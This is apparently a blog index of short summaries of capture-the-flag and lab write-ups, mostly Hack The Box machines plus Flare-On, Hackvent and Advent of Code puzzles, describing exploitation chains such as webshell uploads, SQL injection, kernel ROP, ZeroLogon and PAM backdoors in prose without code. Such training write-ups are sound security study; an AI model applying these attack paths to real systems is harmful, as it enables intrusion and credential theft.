Compromised involves a box that’s already been hacked, and so the challenge is to follow the hacker and both exploit public vulnerabilities as well as make use of backdoors left behind by the hacker. I’ll find a website backup file that shows how the login page was backdoored to record admin credentials to a web accessible file. With those creds, I’ll exploit a vulnerable LiteCart instance, though the public exploit doesn’t work. I’ll troubleshot that to find that the PHP functions typically used for execution are disabled. I’ll show two ways to work around that to get access to the database and execution as the mysql user, who’s shell has been enabled by the hacker. As the mysql user, I’ll find a strace log, likely a makeshift keylogger used by the hacker with creds to pivot to the next user. To get root, I’ll take advantage of either of two backdoors left on the box by the attacker, a PAM backdoor and a LDPRELOAD backdoor. In Beyond Root, I’ll show how to run commands as root using the PAM backdoor from the webshell as www-data.
HTB: RopeTwoctf htb-ropetwo hackthebox pwn python c javascript v8 d8 gef pwngdb reverse-engineering ghidra gdb xss heap pwntools realloc fake-chunk tcache unsorted-bin main-arena fsop free-hook heapinfo kernel-pwn kernel-debug rop kernel-rop kaslr ropgadget stack-pivot prepare-kernel-cred commit-creds apport htb-traceback apt http-proxy cve-2020-8831 wasm wasm-fiddle htb-playertwo
RopeTwo, much like Rope, was just a lot of binary exploitation. It starts with a really neat attack on Google’s v8 JavaScript engine, with a couple of newly added vulnerable functions to allow out of bounds read and write. I’ll use that with an XSS vulnerability in the website to get code execution and a shell. To privesc to user, I’ll use a heap exploit in a SUID binary. The binary was very limiting on the way I could interact with the heap, which lead to my having to re-write my exploit from scratch several times. From user, I’ll escalate again by attacking a kernel module that created a vulnerable device. I’ll leak the kernel memory to get past KASLR, and use some common kernel exploit techniques to execute a ROP chain and return a root shell. In Beyond Root, I’ll look at the unintended method used to get first blood on this box.
Holiday Hack 2020: 'Zat You, Santa Claus? featuring KringleCon 3: French Hensctf sans-holiday-hack
The 2020 SANS Holiday Hack Challenge was less of a challenge to figure out who did it, and more picking apart how Jack Frost managed to hack Santa’s processes. This all takes place at the third annual Kringle Con, where the worlds leading security practitioners show up for talks and challenges. Hosted at back at a currently-being-renovated North Pole, this years conference included 13 talks from leaders in information security, as well as 12 terminals / in-game puzzles and 11 objectives to solve. In solving all of these, the Jack Frost’s plot was foiled. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving.
HTB: Omnictf htb-omni hackthebox windows-iot-core sirep sireprat powershell-credential secretsdump penglab hashcat chisel credentials windows-device-portal oscp-like
Omni looks like a normal Windows host at first, but it’s actually Windows IOT Core, the flavor of Windows that will run on a Raspberry Pi. I’ll abuse Sirep protocol to get code execution as SYSTEM. From there, I’ll get access as both the app user and as administrator to decrypt the flags in each of their home directories. I’ll show multiple ways to get the user’s credentials.
Hackvent 2020 - leet(ish)ctf hackvent polyglot binwalk jsnice python chef docker docker-tar steghide tomcat cve-2020-9484 ysoserial deserialization elf reverse-engineering ghidra lru-cache ios itunes itunes-backup2hashcat fonepaw rsa rsactftool wireshark pcap.
Hackvent 2020 - Hardctf hackvent xls excel forensic cbc crypto gimp polyglot mbr ghidra ida bochs python flask command-injection injection rubiks stl rubik-cube ja3 go ja3transport jwt ecryptfs hashcat ecryptfs2john pyyaml yaml-deserialization binwalk
The first seven hard challenges included my favorite challenge of the year, Santa’s Special GIFt, where the given file is both a GIF image and a master boot record. Handing it as such allowed me to reverse the code and emulate it to get two flags. There’s another challenge that looks at the failures of CBC on encrypting an raw bitmap image, three web exploitation challenges exploiting command injection, JA3 impresonation, and Python YAML deserialization, and another Rubik’s cube to solve.
Hackvent 2020 - Mediumctf hackvent rubiks py222 pil scrambles python dnspy perl obfuscation ssti jinja2 flask werkzeug-debug colb networkx graphs cliques mobilefish rsa crypto wiener mpz
Medium continues with another seven challenges over seven days. There’s a really good crypto challenge involving recovering RSA parameters recovered from a PCAP file and submitted to a Wiener attack, web hacking through an server-side template injection, dotNet reversing, a Rubik’s cube challenge, and what is becoming the annual obfuscated Perl game.
Hackvent 2020 - Easyctf hackvent encoding gimp python stegsolve steganography cyberchef crypto known-plaintext bkcrack binwalk steghide
Hackvent started out early with a -1 day released on 29 November. There were seven easy challenges, including -1, one hidden, and five daily challenges. These challenges were heavy in crypto, image editing / steg, and encoding. My favorite in the group was Chinese Animals, where I spent way more figuring out what was going on after solving than actually solving.
Advent of Code 2020: Day 25ctf advent-of-code python modular-arithmetic
Day 25 is an encryption problem using modular arithmetic. I’ve given two public keys, both of which are of the form 7d mod 20201227 where d is unknown. The challenge is to find each d.
Advent of Code 2020: Day 24ctf advent-of-code python
The twist on day 24 is that it takes place on a grid of hexagons, so each tile has six neighbors, and a normal x,y or r,c coordinate system will be very difficult to use. I’ll use an x, y, z coordinate system to flip tiles based on some input and then watch it evolve based on it’s neighbors.
Advent of Code 2020: Day 23ctf advent-of-code python
Today is another game. This time I’m given a list of numbers and asked to mix it according to some given rules a certain number of times. Today is also the first time this year where I wrote part one, and then completely started over given part two.
Advent of Code 2020: Day 22ctf advent-of-code python
I’m asked to play out a game between two players that in part one looks like the classic card game of war, and in part two goes off in a different direction of “recursive combat”. Both parts came together pretty quickly, though part two had a few places where small mistakes made identifying mistakes difficult.
Advent of Code 2020: Day 21ctf advent-of-code python
Day 21 was welcome relief after day 20. In this one, I’ll parse a list of foods, each with an ingredients list and a listing of some (not necessarily all) of the allergies. I’ll use that list to pair up allergens to ingredients.
Advent of Code 2020: Day 20ctf advent-of-code python
Day 20 was almost the end of my 2020 Advent of Code. I managed to solve part one in 15 minutes, but then part two got me for days. I finally solved it, but I can’t promise pretty code.
Advent of Code 2020: Day 19ctf advent-of-code python
Another day with a section of convoluted validation rules and a series of items to be validated. Today’s rules apply to a string, and I’ll actually use a recursive algorithm to generate a single regex string that can then be applied to each input to check validity. It gets slightly more difficult in the second part, where loops are introduced into the rules. In order to work around this, I’ll guess at a depth at which I can start to ignore further loops.
HTB: Laserctf hackthebox htb-laser nmap ubuntu jetdirect pret printer crypto python proto3 grpc solr cve-2019-17558 gopher pspy sshpass socat tunnel htb-playertwo htb-travel
Laser starts without the typical attack paths, offering only SSH and two unusual ports. One of those is a printer, which gives the opportunity to leak data including a print job and the memory with the encryption key for that job. The PDF gives details of how the second port works, using protocol buffers over gRPC. I’ll use this spec to write my own client, and use that to build a port scanner and scan the box for other open ports on localhost. When I find Apache Solr, I’ll use create another exploit to go through the gRPC service and send a POST request using Gopher to exploit Solr and get code execution and a shell. To escalate to root, I’ll collect SSH credentials for the root user in a container, and then use socat to redirect a cron SCP and SSH job back at the host box and exploit that to get code execution and root.
Advent of Code 2020: Day 18ctf advent-of-code python
Day 18 is reimplementing a simple math system with addition, multiplication, and parentheses, where the order of operations changes. I’ll write a single calc function that takes in the string to evaluate as well as the order of operations to apply.
Advent of Code 2020: Day 17ctf advent-of-code python conway game-of-life
Day 17 was a modified version of Conway’s Game of Life, played across three and four dimensions, where a cells state in the next time step is determined by the its current state and the state of its neighbors.
Advent of Code 2020: Day 16ctf advent-of-code python
Day 16 was an interesting one to think about, as the algorithm for solving it wasn’t obvious. It wasn’t the case like some of the previous ones where there was an intuitive way to think about it but it would take too long. It was more a case of wrapping your head around the problem and how to organize the data so that you could match keys to values using validity rules and a bunch of examples. I made a guess that the data might clean up nicely in a certain way, and when it did, it made the second part much easier.
Advent of Code 2020: Day 15ctf advent-of-code python defaultdict
Day 15 is a game the elves play, where you have to remember the numbers said in a list, and append the next number based on when it was previously said. I’ll solve by storing the numbers not in a list and searching it each time, but rather in a dictionary of lists, where the key is the number and the value is a list of indexes. It still runs a bit slow in part two, but it works.
Advent of Code 2020: Day 14ctf advent-of-code python
Part one of day 14 looked to be some basic binary masking and manipulation. But in part two, it got trickier, as now I need to handle Xs in the mask as both 0 and 1, meaning that there would be 2num X results. I used a recursive function to generate the list of indexes there.
Advent of Code 2020: Day 13ctf advent-of-code python chinese-remainder-theorem
Day 13 is looking at a series of buses that are running on their own time cycles, and trying to find times where the buses arrive in certain patterns. It brings in a somewhat obscure number theory concept called the Chinese Remainder Theorem, which has to do with solving a series of modular linear equations that all equal the same value.
HTB: OpenKeySctf htb-openkeys hackthebox nmap vim bsd openbsd gobuster php auth-userokay cve-2019-19521 cve-2019-19520 cve-2019-19522 shared-object skey cve-2020-7247 htb-onetwoseven
OpenKeyS was all about a series of OpenBSD vulnerabilities published by Qualys in December 2019. I’ll enumerate a web page to find a vim swap file that provides some hints about how the login form is doing auth. I’ll use that to construct an attack that allows me to bypass the authentication and login as Jennifer, retrieving Jennifer’s SSH key. To root, I’ll exploit two more vulnerabilities, first to get access to the auth group using a shared library attack on xlock, and then abusing S/Key authentication. In Beyond Root, I’ll look at another OpenBSD vulnerability that was made public just after the box was released, and play with PHP and the $_REQUEST variable.
Advent of Code 2020: Day 12ctf advent-of-code python
Day 12 is about moving a ship across a coordinate plane using directions and a way point that moves and rotates around the ship. There’s a bit of geometry, and I made a really dumb mistake that took me a long time to figure out.
Advent of Code 2020: Day 11ctf advent-of-code python
Day 11 is grid-based challenge, where I’m giving a grid floor, empty seat, and occupied seat, and asked to step through time using rules that define how a seat will be occupied at time t+1 given the state of it and it’s neighbors at time t. My code gets really ugly today, but it solves.
Advent of Code 2020: Day 10ctf advent-of-code python lru-cache
Day 10 is about looking at a list of numbers. In the first part I’ll just need to make a histogram of the differences between the numbers when sorted. For part two, it’s the first challenge this year where I’ll need to come up with an efficient algorithm to handle it. I’m asked to come up with the number of valid combinations according to some constraints. I’ll use recursion to solve it, and it only works in reasonable time with caching on that recursion.
Advent of Code 2020: Day 9ctf advent-of-code python
Day 9 is two challenges about looking across lists of ints to find pairs or slices with a given sum.
Advent of Code 2020: Day 8ctf advent-of-code python
Today I’m asked to build a small three instruction computer, and parse a series of instructions (puzzle input). I’m told that the instructions form an infinite loop, which is easy to identify in this simple computer any time an instruction is executed a second time. I’ll look at finding where that infinite loop is entered, as well as finding the one instruction that can be patched to fix the code. I’ll create a class for the computer with the thinking that I might be coming back to use it again and build on it later.
Advent of Code 2020: Day 7ctf advent-of-code python lru-cache defaultdict
Day 7 gives me a list of bags, and what bags must go into those bags. The two parts are based on looking for what can hold what and how many. I’ll use defaultdicts to manage the rules, and two recurrsive functions (including one that benefits from lru_cache) to solve the parts.
Advent of Code 2020: Day 6ctf advent-of-code python
Day 6 was another text parsing challenge, breaking the input into groups and then counting across the users within each group. Both parts were similar, with the first counting if any user said yes to a given question, and the latter if every user said yes to a given question. Python makes this a breeze either way.
HTB: Unbalancedhtb-unbalanced hackthebox ctf nmap squid http-proxy foxy-proxy rsync encfs john gobuster squidclient xpath-injection python pihole webshell upload credentials password-reuse htb-joker htb-zetta
Unbalanced starts with a Squid proxy and RSync. I’ll use RSync to pull back the files that underpin an Encrypted Filesystem (EncFS) instance, and crack the password to gain access to the backup config files. In those files I’ll find the Squid config, which includes the internal site names, as well as the creds to manage the Squid. Looking at the proxy stats, I can find two internal IPs, and guess the existence of a third, which is currently out of order for security fixes. In the site on the third IP, I’ll find XPath injection allowing me to leak a bunch of usernames and passwords, one of which provides SSH access to the host. I’ll exploit into a Pi-Hole container using an exploit to upload a webshell, and find a script which contains the root creds for the host. In Beyond Root, I’ll look at why the searchsploit version of the PiHole exploit didn’t work.
Advent of Code 2020: Day 5ctf advent-of-code python
Day 5 is wrapped in a story about plane ticket seat finding, but really it boils down to a simple binary to integer conversion, and then finding the difference of two sets and cleaning up what’s left based on some simple rules.
Advent of Code 2020: Day 4ctf advent-of-code python regex
Day 4 presented another text parsing challenge. In the first part, I just needed to validate if each section contained a specific seven strings, which is easy enough to solve in Python. For part two, I need to now look at the text following each of these strings, and apply some validation rules. At first I thought I’d throw out my part 1 work and start processing all the data into a Python dict. But then I realized I could just write a regex for each validation, and use the same pattern.
Advent of Code 2020: Day 3ctf advent-of-code python
Advent of code always dives into visual mapping in a way that makes you conceptualize 2D (or 3D) space and move through it. I’ve got a map that represents a slope with clear spaces and trees, and that repeats moving to the right. As this is an early challenge, it’s still relatively simple to handle the map with just an array of strings, which I’ll do to count the trees I encounter on different trajectories moving across the map.
Advent of Code 2020: Day 2ctf advent-of-code python
Day 2 was about processing lines that contained two numbers, a character, and a string which is referred to as a password. Both parts are about using the numbers and the character to determine if the password is “valid”. How the numbers and character become a rule is different in parts 1 and 2.
Advent of Code 2020: Day 1ctf advent-of-code python
Advent of Code is a CTF put on by Google every December, providing coding challenges, and it’s a favorite of mine to practice. There are 25 days to collect 50 stars. For Day 1, the puzzle was basically reading a list of numbers, and looking through them for a pair and a set of three that summed to 2020. For each part, I’ll multiple the identified numbers together to get the solution.
HTB: SneakyMailerhtb-sneakymailer ctf hackthebox nmap wfuzz vhosts gobuster phishing swaks htb-xen imap smtp evolution webshell php pypi hashcat htpasswd setup-py htb-chaos htb-canape sudo pip service oscp-like
SneakyMailer starts with web enumeration to find a list of email addresses, which I can use along with SMTP access to send phishing emails. One of the users will click on the link, and return a POST request with their login creds. That provides access to the IMAP inbox for that user, where I’ll find creds for FTP. The FTP access is in the web directory, and while there’s nothing interesting there, I can write a webshell and get execution, and a shell. To privesc, I’ll submit a malicious Python package to the local PyPi server, which provides execution and a shell as that user. For root, I’ll abuse a sudo rule to run pip, installing the same package again. In Beyond Root, I’ll look at the automation on the box running as services.
HTB: Buffctf hackthebox htb-buff nmap windows gobuster gym-management-system searchsploit cloudme chisel msfvenom webshell defender oscp-like
Buff is a really good OSCP-style box, where I’ll have to identify a web software running on the site, and exploit it using a public exploit to get execution through a webshell. To privesc, I’ll find another service I can exploit using a public exploit. I’ll update with my own shellcode to make a reverse shell, and set up a tunnel so that I can connect to the service that listens only on localhost. From there, the exploit script returns an administrator shell. In Beyond Root, I’ll step through the first script and perform the exploit manually, and look at how Defender was blocking some of my attempts.
HTB: Intensehtb-intense ctf hackthebox nmap snmp snmpwalk sqli injection sqlite python burp bruteforce penglab cookies hash-extension hash-extender directory-traversal snmp-shell tunnel bof logic-error htb-rope gdb peda
Intense presented some cool challenges. I’ll start by finding a SQL injection vulnerability into an SQLlite database. I’m able to leak the admin hash, but not crack it. Using the source code for the site, I’ll see that if I can use a hash extension attack, I can use the hash trick the site into providing admin access. From there, I’ll use a directory traversal bug in a log reading API to find SNMP read/write creds, which I’ll use to get a shell with snmp-shell. I can use that to find a custom binary listening on localhost, as well as it’s source code. I’ll use the snmp account to create an SSH tunnel, and exploit a logic bug in the code to overflow the buffer, bypass protections, and get a shell as root. In Beyond Root, I’ll look at why I didn’t have success with the system libc call in my ROP, figure out why, and fix it.
HTB: Tabbyht
Tabby was a well designed easy level box that required finding a local file include (LFI) in a website to leak the credentials for the Tomcat server on that same host. The user who’s creds I gain access to only has access to the command line manager API, not the GUI, but I can use that to upload a WAR file, get execution, and a shell. I’ll crack the password on a backup zip archive and then use that same password to change to the next user. That user is a member of the lxd group, which allows them to start containers. I’ve shown this root before, but this time I’ll include a really neat trick from m0noc that saves several steps. In Beyond Root, I’ll pull apart the WAR file and show what’s actually in it.
Flare-On 2020: breakflare-on ctf flare-on-break reverse-engineering ghidra ptrace hook ldpreload pre-main gdb crypto feistel-cipher unpack modinv python htb-mischief htb-obscurity htb-teacher htb-popcorn htb-lightweight htb-sunday
break was an amazing challenge. Just looking at main, it looks like a simple comparison against a static flag. But there’s an init function that runs first, forking a child process that then attaches a debugger to the parent, hooking all of it’s system calls and crashes. The child itself forks a second child, which attaches to the first child, handling several intentional crash points in the first child’s code. The effectively prevents my debugging the parent for first child, as only one debugger can attach at a time. I’ll use two different approaches - hooking library calls and patching the second child’s functionality directly into the first child, allowing me to debug the first child. Using these techniques, I’ll wind through three parts of the flag, each successively more difficult to break out.
Flare-On 2020: crackinstallerflare-on ctf flare-on-crackinstaller reverse-engineering capcom-sys driver kernel-debug
crackinstaller.exe was a complicated binary that installed the Capcom.sys driver, and then exploited it to load another driver into memory. It also dropped and installed another DLL, a credential helper. I used kernel debugging to see how the second driver is loaded, and eventually find a password, which I can feed into the credential helper to get the flag. I spent over two of the six weeks working crackinstaller.exe, and unfortunately, I stopped taking meaningful notes very early in that process, so this won’t be much of a writeup, but rather a high level overview.
Flare-On 2020: Aardvarkflare-on ctf flare-on-aardvark reverse-engineering wsl ghidra resource-hacker process-hacker gdb peda pwndbg
Aardvark was a game of tik-tac-toe where the computer always goes first, and can’t lose. Instead of having the decision logic of the computer in the program, it drops an ELF binary to act as the computer, and communicates with it over a unix socket, all of which is possible on Windows with the Windows Subsystem for Linux (WSL). Once I understand how the computer is playing, I’ll modify the computers logic so that I can win, and get the flag. I’ll play with different ways to patch the binary, starting manually with gdb, and moving to patching the ELF resource a couple different ways.
HTB: Fusectf htb-fuse hackthebox windows ldap ldapsearch rpc smb winrm evil-winrm crackmapexec smbmap rpcclient papercut gobuster cewl hydra smbpasswd rpcclient capcom-sys driver visual-studio eoploaddriver msfvenom scheduled-task ghidra oscp-like
Fuse was all about pulling information out of a printer admin page. I’ll collect usernames and use cewl to make a wordlist, which happens to find the password for a couple accounts. I’ll need to change the password on the account to use it, and then I can get RPC access, where I’ll find more creds in the comments. I can use those creds for WinRM access, where I’ll find myself with privileges to load a driver. I’ll use the popular Capcom.sys driver to load a payload that returns a shell as system. In Beyond Root, I’ll look at the scheduled tasks that are managing the users passwords and trying to uninstall drivers put in place by HTB players.
Flare-On 2020: RE Crowdflare-on ctf flare-on-re-crowd reverse-engineering pcap wireshark tshark cve-2017-7269 shellcode scdbg crypto python x64dbg cff-explorer cyberchef procmon
RE Crowd was a different kind of reversing challenge. I’m given a PCAP that includes someone trying to exploit an IIS webserver using CVE-2017-7269. This exploit uses alphanumeric shellcode to run on success. I’ll pull the shellcode and analyze it, seeing that it’s a Metasploit loader that connects to a host and then the host sends back an encrypted blob. The host then sends another encrypted blob back to the attcker. I’ll use what I can learn about the attacker’s commands to decrypt that exfil and find the flag.
Flare-On 2020: CodeItflare-on ctf flare-on-codeit reverse-engineering autoit exe2aut upx myauttoexe script-obfuscation crypto
The sixth Flare-On7 challenge was tricky in a way that’s hard to put on the page. It really was just a AutoIt script wrapped in a Windows exe. I’ll use a tool to revert it back to a large, obfuscated script, and then get to work deobfuscating it. Eventually I’ll see that it is looking for a specific hostname, and on switching my hostname to match, I get a QRcode that contains the flag.
Flare-On 2020: TKAppflare-on ctf flare-on-tkapp reverse-engineering tizen tpk dnspy dotnet emulation python.
Flare-On 2020: report.xlsflare-on ctf flare-on-report reverse-engineering xls vba olevba evil-clippy pcode vba-stomp python pcodedmp pcode2code script-obfuscation.
Flare-On 2020: wednesdayflare-on ctf flare-on-wednesday reverse-engineering ghidra nimlang x64dbg patching.
Flare-On 2020: garbageflare-on ctf flare-on-garbage upx pe cff-explorer ghidra reverse-engineering resource-hacker
garbage was all about understanding the structure of an exe file, and how to repair it when the last few hundred bytes were truncated. I’ll troubleshoot the binary and eventually get it working to the point that I can unpack it, do static analysis, and get the flag. I’ll also show how to fix the binary so that it will just run and print the flag in a message box.
Flare-On 2020: Fidlerflare-on ctf flare-on-fidler python pygame reverse-engineering.
HTB: Dyplesherhackthebox ctf htb-dyplesher nmap memcached gobuster gogs git gitdumper memcached-binary memcached-auth memcached-cli memcat credentials git-bundle sqlite hashcat bukkit minecraft spigot intellij java jar webshell packet-capture wireshark cuberite rabbitmq amqp-publish lua htb-canape htb-waldo htb-dab
Dyplesher pushed server modern technologies that are not common in CTFs I’ve done. Initial access requires finding a virtual host with a .git directory that allows me to find the credentials used for the memcache port. After learning about the binary memcache protocol that supports authentication, I’m able to connect and dump usernames and password from the cache, which provide access to a Gogs instance. In Gogs, I’ll find four git bundles (repo backups), one of which contains custom code with an SQLite db containing password hashes. One cracks, providing access to the web dashboard. In this dashboard, I’m able to upload and run Bukkit plugins. I’ll write a malicious one that successfully writes both a webshell and an SSH key, both of which provide access to the box as the same first user. This user has access to a dumpcap binary, which I’ll use to capture traffic finding Rabbit message queue traffic that contains the usernames and password for the next user. This user has instructions to send a url over the messaging queue, which will cause the box to download and run a cuberite plugin. I’ll figure out how to publish my host into the queue, and write a malicious Lua script that will provide root access. In Beyond Root, I’ll look more deeply at the binary memcache protocol.
HTB: Blunderhtb-blunder hackthebox ctf nmap ubuntu bludit cms searchsploit github cewl bruteforce python upload filter credentials crackstation cve-2019-14287 sudo oscp-like htaccess
Blunder starts with a blog that I’ll find is hosted on the BludIt CMS. Some version enumeration and looking at releases on GitHub shows that this version is vulnerable to a bypass of the bruteforce protections, as well as an upload and execute filter bypass on the PHP site. I’ll write my own scripts for each of these, and use them to get a shell. From there, I’ll find creds for the next user, where I’ll find the first flag. Now I can also access sudo, where I’ll see I can run sudo to get a bash shell as any non-root user. I’ll exploit CVE-2019-14287 to run that as root, and get a root shell.
HTB: Cachectf htb-cache hackthebox nmap ubuntu gobuster vhosts javascript credentials password-reuse wfuzz openemr searchsploit auth-bypass sqli injection sqlmap hashcat memcached docker htb-dab htb-olympus
Cache rates medium based on number of steps, none of which are particularly challenging. There’s a fair amount of enumeration of a website, first, to find a silly login page that has hardcoded credentials that I’ll store for later, and then to find a new VHost that hosts a vulnerable OpenEMR system. I’ll exploit that system three ways, first to bypass authentication, which provides access to a page vulnerable to SQL-injection, which I’ll use to dump the hashes. After cracking the hash, I’ll exploit the third vulnerability with a script from ExploitDB which provides authenticated code execution. That RCE provides a shell. I’ll escalate to the next user reusing the creds from the hardcoded website. I’ll find creds for the next user in memcached. This user is in the docker group, which I’ll exploit to get root access.
HTB: Blackfieldhtb-blackfield ctf hackthebox nmap dns ldap ldapsearch crackmapexec smbmap smbclient as-rep-roast hashcat bloodhound bloodhound-py rpc-password-reset pypykatz evil-winrm sebackupprivilege copy-filesepackupprivilege efs diskshadow ntds vss secretsdump smbserver icacls cipher windows-sessions metasploit meterpreter oscp-plus htb-forest htb-multimaster htb-re
Blackfield was a beautiful Windows Activity directory box where I’ll get to exploit AS-REP-roasting, discover privileges with bloodhound from my remote host using BloodHound.py, and then reset another user’s password over RPC. With access to another share, I’ll find a bunch of process memory dumps, one of which is lsass.exe, which I’ll use to dump hashes with pypykatz. Finally with a hash that gets a WinRM shell, I’ll abuse backup privileges to read the ntds.dit file that contains all the hashes for the domain (as well as a copy of the SYSTEM reg hive). I’ll use those to dump the hashes, and get access as the administrator. In Beyond Root, I’ll look at the EFS that prevented my reading root.txt using backup privs, as well as go down a rabbit hole into Windows sessions and why the cipher command was returning weird results.
HTB: Admirerhtb-admirer hackthebox ctf nmap debian gobuster robots-text source-code adminer mysql credentials sudo pythonpath path-hijack python-library-hijack oscp-like htb-nineveh htb-kryptos
Admirer provided a twist on abusing a web database interface, in that I don’t have creds to connect to any databases on Admirer, but I’ll instead connect to a database on myhost and use queries to get local file access to Admirer. Before getting there, I’ll do some web enumeration to find credentials for FTP which has some outdated source code that leads me to the Adminer web interface. From there, I can read the current source, and get a password which works for SSH access. To privesc, I’ll abuse sudo configured to allow me to pass in a PYTHONPATH, allowing a Python library hijack.
HTB: Multimasterhtb-multimaster ctf hackthebox nmap wfuzz waf filter unicode sqlmap tamper hashcat crackmapexec cyberchef python sqli injection windows mssql rid evil-winrm cef-debugging reverse-engineering bloodhound amsi powersploit as-rep-roast server-operators service service-hijack sebackupprivilege serestoreprivilege robocopy cve-2020-1472 zerologon htb-forest
Multimaster was a lot of steps, some of which were quite difficult. I’ll start by identifying a SQL injection in a website. I’ll have to figure out the WAF and find a way past that, dumping credentials but also writing a script to use MSSQL to enumerate the domain users. To pivot to the second user, I’ll exploit an instance of Visual Studio Code that’s left an open CEF debugging socket open. That user has access to a DLL in the web directory, in which I’ll find more credentials to pivot to another user. This user has GenericWrite privileges on another user, so I’ll abuse that to get a shell. This final user is in the Server Operators group, allowing me to modify services to get a shell as SYSTEM. I’ll show two alternative roots, abusing the last user’s SeBackupPrivilege and SeRestorePrivilege with robotcopy to read the flag, and using ZeroLogon to go right to administrator in one step.
ZeroLogon - Owning HTB machines with CVE-2020-1472cve-2020-1472 exploit domain-controller htb-monteverde zerologon impacket python virtualenv secretsdump
CVE-2020-1472 was patched in August 2020 by Microsoft, but it didn’t really make a splash until the last week when proof of concept exploits started hitting GutHub. It truly is a short path to domain admin. I’ll look at the exploit and own some machines from HTB with it.
HTB: Travelhackthebox ctf htb-travel nmap ubuntu vhosts wfuzz gobuster wordpress awesome-rss simplepie git gittools gitdumper source-code memcached ssrf filter deserialization php gopher gopherus payloadsallthethings webshell container docker database credentials password-reuse hashcat viminfo ldap authorizedkeyscommand ldif ldapadd getent htb-ypuffy
Travel was just a great box because it provided a complex and challenging puzzle with new pieces that were fun to explore. I’ll start off digging through various vhosts until I eventually find an exposed .git folder on one. That provides me the source for another, which includes a custom RSS feed that’s cached using memcache. I’ll evaluate that code to find a deserialization vulnerability on the read from memcache. I’ll create an exploit using a server-side request forgery attack to poison the memcache with a serialized PHP payload that will write a webshell, and then trigger it, gaining execution and eventually a shell inside a container. I’ll find a hash in the database which I can crack to get a password for the user on the main host. This user is also the LDAP administrator, and SSH is configured to check LDAP for logins. I’ll pick an arbitrary user and add an SSH private key, password, and the sudo group to their LDAP such that then when I log in as that user, I can just sudo to root. In Beyond Root I’ll explore a weird behavior I observed in the RSS feed.
HTB: Haircutctf htb-haircut hackthebox nmap php upload command-injection parameter-injection webshell gobuster curl filter screen oscp-like
Haircut started with some web enumeration where I’ll find a PHP site invoking curl. I’ll use parameter injection to write a webshell to the server and get execution. I’ll also enumerate the filters and find a way to get command execution in the page itself. To jump to root, I’ll identify a vulnerable version of screen that is set SUID (which is normal). I’ll walk through this exploit. In Beyond Root, I’ll take a quick look at the filtering put in place in the PHP page.
RoguePotato on Remotehtb-remote hackthebox ctf windows seimpersonate roguepotato lonelypotato juicypotato ippsec socat
JuicyPotato was a go-to exploit whenever I found myself with a Windows shell with SeImpersonatePrivilege, which typically was whenever there was some kind of webserver exploit. But Microsoft changed things in Server 2019 to brake JuicyPotato, so I was really excited when splinter_code and decoder came up with RoguePotato, a follow-on exploit that works around the protections put into place in Server 2019. When I originally solved Remote back in March, RoguePotato had not yet been released. I didn’t have time last week to add it to my Remote write-up, so I planned to do a follow up post to show it. While in the middle of this post, I also watched IppSec’s video where he tries to use RoguePotato on Remote in a way that worked but shouldn’t have, raising a real mystery. I’ll dig into that and show what happened as well.
HTB: Remotehtb-remote hackthebox ctf nmap nfs umbraco hashcat nishang teamviewer credentials evilwinrm oscp-like
To own Remote, I’ll need to find a hash in a config file over NFS, crack the hash, and use it to exploit a Umbraco CMS system. From there, I’ll find TeamView Server running, and find where it stores credentials in the registry. After extracting the bytes, I’ll write a script to decrypt them providing the administrator user’s credentials, and a shell over WinRM or PSExec.
HTB: Mantishtb-mantis ctf hackthebox nmap smbmap smbclient rcpclient kerbrute orchard-cms gobuster mssql mssqlclient dbeaver crackmapexec ms14-068 kerberos golden-ticket goldenpac
Mantis was one of those Windows targets where it’s just a ton of enumeration until you get a System shell. The only exploit on the box was something I remember reading about years ago, where a low level user was allowed to make a privileged Kerberos ticket. To get there, I’ll have to avoid a few rabit holes and eventually find creds for the SQL Server instance hidden on a webpage. The database has domain credentials for a user. I’ll use those to perform the attack, which will return SYSTEM access.
HTB: Quickhtb-quick hackthebox ctf nmap ubuntu gobuster vhosts wfuzz quic http3 curl edgeside-include-injection esi injection race-condition cracking python credentials su oscp-plus
Quick was a chance to play with two technologies that I was familiar with, but I had never put hands on with either. First it was finding a website hosted over Quic / HTTP version 3. I’ll build curl so that I can access that, and find creds to get into a ticketing system. In that system, I will exploit an edge side include injection to get execution, and with a bit more work, a shell. Next I’ll exploit a new website available on localhost and take advantage of a race condition that allows me to read and write arbitrary files as the next user. Finally, to get root I’ll find creds in a cached config file. In Beyond Root, I’ll use a root shell to trouble-shoot my difficulties getting a shell and determine where things were breaking.
HTB: Calamityhtb-calamity ctf hackthebox nmap gobuster webshell scripting filter phpbash steganography audacity lxd bof gdb peda checksec nx mprotect python exploit pattern-create ret2libc youtube htb-obscurity htb-frolic htb-mischief
Calamity was released as Insane, but looking at the user ratings, it looked more like an easy/medium box. The user path to through the box was relatively easy. Some basic enumeration gives access to a page that will run arbitrary PHP, which provides execution and a shell. There’s an audio steg challenge to get the user password and a user shell. People likely rated the box because there was an unintended root using lxd. I’ve done that before, and won’t show it here. The intended path was a contrived but interesting pwn challenge that involved three stages of input, the first two exploiting a very short buffer overflow to get access to a longer buffer overflow and eventually a root shell. In Beyond Root, I’ll look at some more features of the source code for the final binary to figure out what some assembly did, and why a simple return to libc attack didn’t work.
HTB: Magichackthebox ctf htb-magic nmap sqli injection upload filter gobuster webshell php mysqldump su suid path-hijack apache oscp-like htb-networked
Magic has two common steps, a SQLI to bypass login, and a webshell upload with a double extension to bypass filtering. From there I can get a shell, and find creds in the database to switch to user. To get root, there’s a binary that calls popen without a full path, which makes it vulnerable to a path hijack attack. In Beyond Root, I’ll look at the Apache config that led to execution of a .php.png file, the PHP code that filtered uploads, and the source for the suid binary.
HTB: Tracebackhtb-traceback ctf hackthebox nmap webshell vim gobuster smevk lua luvit ssh motd linpeas linenum
Traceback starts with finding a webshell that’s already one the server with some enumeration and a bit of open source research. From there, I’ll pivot to the next user with sudo that allows me to run Luvit, a Lua interpreter. To get root, I’ll notice that I can write to the message of the day directory. These scripts are run by root whenever a user logs in. I actually found this by seeing the cron that cleans up scripts dropped in this directory, but I’ll also show how to find it with some basic enumeration as well. In Beyond Root, I’ll take a quick look at the cron that’s cleaning up every thiry seconds.
HTB: Jokerhackthebox htb-joker ctf nmap udp tftp squid http-proxy foxyproxy hashcat penglab gobuster python werkzeug iptables socat sudo sudoedit sudoedit-follow ssh tar cron wildcard symbolic-link checkpoint htb-tartarsauce htb-shrek
